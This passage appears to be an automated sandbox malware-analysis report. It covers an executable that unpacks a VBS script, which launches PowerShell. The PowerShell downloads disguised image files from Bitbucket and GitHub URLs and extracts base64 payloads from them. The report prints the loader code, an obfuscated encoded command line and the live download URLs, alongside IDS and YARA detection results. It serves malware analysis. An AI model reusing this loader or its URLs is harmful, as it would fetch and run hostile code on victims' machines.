'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param 
([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startInde
        Timestamp                        SID      Severity  Classtype                      Source IP        Source Port  Destination IP  Destination Port  Protocol
        2024-12-16T15:36:24.556728+0100  2049038  1         A Network Trojan was detected  185.199.109.133  443          192.168.2.7     49701             TCP

        AV Detection

        barindex
        Source: GdGXG0bnxH.exe | ReversingLabs: Detection: 39%
        Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.8% probability
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E830EC GetSystemDirectoryA,LoadLibraryA,GetProcAddress,DecryptFileA,FreeLibrary,GetWindowsDirectoryA,SetCurrentDirectoryA,4_2_00007FF7E6E830EC
        Source: unknown | HTTPS traffic detected: 185.166.143.50:443 -> 192.168.2.7:49700 version: TLS 1.2
        Source: unknown | HTTPS traffic detected: 185.199.109.133:443 -> 192.168.2.7:49701 version: TLS 1.2
        Source: GdGXG0bnxH.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
        Source: Binary string: wextract.pdb source: GdGXG0bnxH.exe
        Source: Binary string: wextract.pdbGCTL source: GdGXG0bnxH.exe
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdb source: powershell.exe, 0000000B.00000002.1496797841.0000024985320000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: n.pdb{ source: powershell.exe, 0000000B.00000002.1497283898.0000024986DC9000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: s\dll\System.Core.pdbn source: powershell.exe, 0000000B.00000002.1497238738.0000024986D66000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: C:\Users\Administrator\source\repos\testpowershell\testpowershell\obj\Debug\testpowershell.pdbG_a_ S__CorExeMainmscoree.dll source: powershell.exe, 0000000B.00000002.1496797841.0000024985320000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E8204C FindFirstFileA,lstrcmpA,lstrcmpA,SetFileAttributesA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,4_2_00007FF7E6E8204C

        Software Vulnerabilities

        barindex
        Source: C:\Windows\System32\wscript.exe | Child: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

        Networking

        barindex
        Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 185.199.109.133:443 -> 192.168.2.7:49701
        Source: global traffic | HTTP traffic detected: GET /jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611 HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /gmedusa135/nano/refs/heads/main/new_img123.jpg HTTP/1.1 Host: raw.githubusercontent.com Connection: Keep-Alive
        Source: global traffic | HTTP traffic detected: GET /eqweqwt/wqeqwfs/downloads/agchIkI.txt HTTP/1.1 Host: bitbucket.org Connection: Keep-Alive
        Source: Joe Sandbox View | IP Address: 185.199.109.133 185.199.109.133
        Source: Joe Sandbox View | IP Address: 185.166.143.50 185.166.143.50
        Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
        Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global traffic | DNS traffic detected: DNS query: bitbucket.org
        Source: global traffic | DNS traffic detected: DNS query: raw.githubusercontent.com
        Source: global traffic | DNS traffic detected: DNS query: bbuseruploads.s3.amazonaws.com
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bbuseruploads.s3.amazonaws.com
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://bitbucket.org
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://pesterbdd.com/images/Pester.png
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E390000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://s3-w.us-east-1.amazonaws.com
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
        Source: powershell.exe, 00000009.00000002.1829289643.00000179CF911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/wsdl/
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
        Source: powershell.exe, 00000009.00000002.1829289643.00000179CF97C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1829289643.00000179CF911000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/pscore68
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelp
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E5F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aka.ms/winsvr-2022-pshelpX
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://aui-cdn.atlassian.com/
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-exp.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bbuseruploads.s3.amazonaws.com/84b86a50-0f03-4f00-a68a-9b48f6a9ad1a/downloads/0d99d38f-9760-
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498DFF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/eqweqwt/wqeqwfs/downloads/agchIkI.txt
        Source: powershell.exe, 00000009.00000002.1829289643.00000179CFEC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875470963.00000179E7FF1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496285390.0000024985080000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497143877.0000024986D57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496870841.00000249853A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497066916.0000024986CF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E51A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496285390.00000249850A1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496372407.0000024985106000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://bitbucket.org/jhgfhhkjeedefdf/mnbvgjdg/downloads/test.jpg?537611
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://cdn.cookielaw.org/
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://dz8aopenkvv6s.cloudfront.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
        Source: powershell.exe, 0000000B.00000002.1497423977.000002498E5F9000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
        Source: powershell.exe, 0000000B.00000002.1497143877.0000024986D3E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ion=v4.5
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987308000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com
        Source: powershell.exe, 00000009.00000002.1829289643.00000179CFEC7000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1875470963.00000179E7FF1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496285390.0000024985080000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497143877.0000024986D57000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496870841.00000249853A4000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987129000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497066916.0000024986CF0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024986F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E51A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496285390.00000249850A1000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1496372407.0000024985106000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.prod-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://remote-app-switcher.stg-east.frontend.public.atl-paas.net
        Source: powershell.exe, 0000000B.00000002.1497423977.0000024987323000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987300000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.000002498E382000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.1497423977.0000024987304000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://web-security-reports.services.atlassian.com/csp-report/bb-website
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49700
        Source: unknown | Network traffic detected: HTTP traffic on port 49728 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 49701 -> 443
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49728
        Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49701

        System Summary

        barindex
        Source: Process Memory Space: powershell.exe PID: 7412, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Network Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{093FF999-1EA0-4079-9525-9614C3504B74}
        Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$sodigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Go$a$Bn$GY$a$Bo$Gs$agBl$GU$Z$Bl$GY$Z$Bm$C8$bQBu$GI$dgBn$Go$Z$Bn$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwB0$GU$cwB0$C4$agBw$Gc$Pw$1$DM$Nw$2$DE$MQ$n$Cw$I$$n$Gg$d$B0$H$$cw$6$C8$LwBy$GE$dw$u$Gc$aQB0$Gg$dQBi$HU$cwBl$HI$YwBv$G4$d$Bl$G4$d$$u$GM$bwBt$C8$ZwBt$GU$Z$B1$HM$YQ$x$DM$NQ$v$G4$YQBu$G8$LwBy$GU$ZgBz$C8$a$Bl$GE$Z$Bz$C8$bQBh$Gk$bg$v$G4$ZQB3$F8$aQBt$Gc$MQ$y$DM$LgBq$H$$Zw$n$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$I$$9$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$H
M$I$$k$Gw$aQBu$Gs$cw$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$Gk$Zg$g$Cg$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$LQBu$GU$I$$k$G4$dQBs$Gw$KQ$g$Hs$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C$$PQ$g$Fs$UwB5$HM$d$Bl$G0$LgBU$GU$e$B0$C4$RQBu$GM$bwBk$Gk$bgBn$F0$Og$6$FU$V$BG$Dg$LgBH$GU$d$BT$HQ$cgBp$G4$Zw$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$FM$V$BB$FI$V$$+$D4$Jw$7$C$$J$Bl$G4$Z$BG$Gw$YQBn$C$$PQ$g$Cc$P$$8$EI$QQBT$EU$Ng$0$F8$RQBO$EQ$Pg$+$Cc$Ow$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$KQ$7$C$$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$ZQBu$GQ$SQBu$GQ$ZQB4$C$$PQ$g$CQ$aQBt$GE$ZwBl$FQ$ZQB4$HQ$LgBJ$G4$Z$Bl$Hg$TwBm$Cg$J$Bl$G4$Z$BG$Gw$YQBn$Ck$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$C0$ZwBl$C$$M$$g$C0$YQBu$GQ$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$C0$ZwB0$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$Ck$I$B7$C$$J$Bz$HQ$YQBy$HQ$SQBu$GQ$ZQB4$C$$Kw$9$C$$J$Bz$HQ$YQBy$HQ$RgBs$GE$Zw$u$Ew$ZQBu$Gc$d$Bo$D
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E82C54 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,4_2_00007FF7E6E82C54
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E81C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx,4_2_00007FF7E6E81C0C
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E866C4 4_2_00007FF7E6E866C4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E840C4 4_2_00007FF7E6E840C4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E82DB4 4_2_00007FF7E6E82DB4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E86CA4 4_2_00007FF7E6E86CA4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E85D90 4_2_00007FF7E6E85D90
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E81D28 4_2_00007FF7E6E81D28
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E81C0C 4_2_00007FF7E6E81C0C
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E83530 4_2_00007FF7E6E83530
        Source: GdGXG0bnxH.exe | Static PE information: Resource name: RT_RCDATA type: Microsoft Cabinet archive data, Windows 2000/XP setup, 6328 bytes, 1 file, at 0x2c +A "675c87f6bfee1.vbs", ID 1356, number 1, 1 datablock, 0x1503 compression
        Source: GdGXG0bnxH.exe | Static PE information: Resource name: RT_RCDATA type: GLS_BINARY_LSB_FIRST
        Source: GdGXG0bnxH.exe | Binary or memory string: OriginalFilename vs GdGXG0bnxH.exe
        Source: GdGXG0bnxH.exe, 00000004.00000000.1276448002.00007FF7E6E8E000.00000002.00000001.01000000.00000004.sdmp | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs GdGXG0bnxH.exe
        Source: GdGXG0bnxH.exe | Binary or memory string: OriginalFilenameWEXTRACT.EXE .MUID vs GdGXG0bnxH.exe
        Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 5348
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: Commandline size = 2006
        Source: Process Memory Space: powershell.exe PID: 7412, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 7548, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engine | Classification label: mal100.spre.expl.evad.winEXE@12/9@4/2
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E86CA4 GetCurrentDirectoryA,SetCurrentDirectoryA,GetDiskFreeSpaceA,MulDiv,GetVolumeInformationA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA,memset,GetLastError,FormatMessageA,SetCurrentDirectoryA, | 4_2_00007FF7E6E86CA4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E81C0C GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle,ExitWindowsEx, | 4_2_00007FF7E6E81C0C
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E866C4 LocalAlloc,LocalFree,lstrcmpA,LocalFree,GetTempPathA,GetDriveTypeA,GetFileAttributesA,GetDiskFreeSpaceA,MulDiv,GetWindowsDirectoryA,GetFileAttributesA,CreateDirectoryA,SetFileAttributesA,GetWindowsDirectoryA, | 4_2_00007FF7E6E866C4
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Code function: 4_2_00007FF7E6E87AC8 FindResourceA,LoadResource,DialogBoxIndirectParamA,FreeResource, | 4_2_00007FF7E6E87AC8
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7420:120:WilError_03
        Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7260:120:WilError_03
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | File created: C:\Users\user~1\AppData\Local\Temp\IXP000.TMP
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c 675c87f6bfee1.vbs
        Source: GdGXG0bnxH.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
        Source: C:\Windows\System32\cmd.exe | File read: C:\Users\user\Desktop\desktop.ini
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
        Source: GdGXG0bnxH.exe | ReversingLabs: Detection: 39%
        Source: unknown | Process created: C:\Users\user\Desktop\GdGXG0bnxH.exe "C:\Users\user\Desktop\GdGXG0bnxH.exe"
        Source: C:\Users\user\Desktop\GdGXG0bnxH.exe | Process created: C:\Windows\System32\cmd.exe cmd.exe /c 675c87f6bfee1.vbs
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user~1\AppData\Local\Temp\IXP000.TMP\675c87f6bfee1.vbs"
